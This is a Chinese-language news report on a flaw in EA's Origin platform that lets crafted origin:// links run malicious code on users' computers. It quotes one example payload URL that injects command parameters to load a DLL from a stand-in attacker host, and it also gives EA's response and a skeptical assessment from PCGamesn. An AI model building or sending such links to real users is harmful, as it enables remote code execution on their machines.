根據報導,美商藝電(EA)的遊戲平台Origin有個安全漏洞,可讓Origin網路商店變成一個能夠在客戶電腦安裝惡意程式的攻擊平台,讓四千萬名用戶電腦曝露於遭駭客入侵的危險。
數名資訊安全研究人員表示,Origin有個安全漏洞,可讓濫用Origin URL處理機制的人加以利用,也就是說,駭客能夠製造惡意的網路連結,從遠端在由Origin在受害者電腦安裝的系統上執行惡意程式碼。這些研究人員也在上週荷蘭阿姆斯特丹舉行的一個場資安研討會中展示了惡意程式如何透過Origin連結假裝成遊戲連結在用戶的系統上執行。
通常而言,當用戶以Origin啟動遊戲時,客戶端會呼叫請求一個「origin://LaunchGame/[GameID] 」網址,而這個Origin漏洞是,駭客可以修改網址路徑,變成類似「origin://LaunchGame/[GameID]?CommandParams= -openautomate ATTACKER_IPevil.dll」等有惡意軟體的網站,進而藉機入侵用戶電腦。
對此,美商藝電表示,它的團隊時常會對這類架設性狀況進行調查,也經常更新自家的安全架構。
PCGamesn網站則認為,對駭客而言,要利用這個安全漏洞並不是很方便,因為網站有異常行為時,很多瀏覽器會偵測到,也會要用戶確認是否真的要到某個網址。另外,這幾名研究人員也沒有展示駭客是如何到用戶的Origin客戶端修改URL。因此,它認為,只要時常更新防毒軟體,也不要到可疑網站,應該就沒事。
來源:PCGamer、pcgamesn、Info Secutiry、ars technica
以上消息引用外電報導,不代表本站立場。
從 APP 打開
X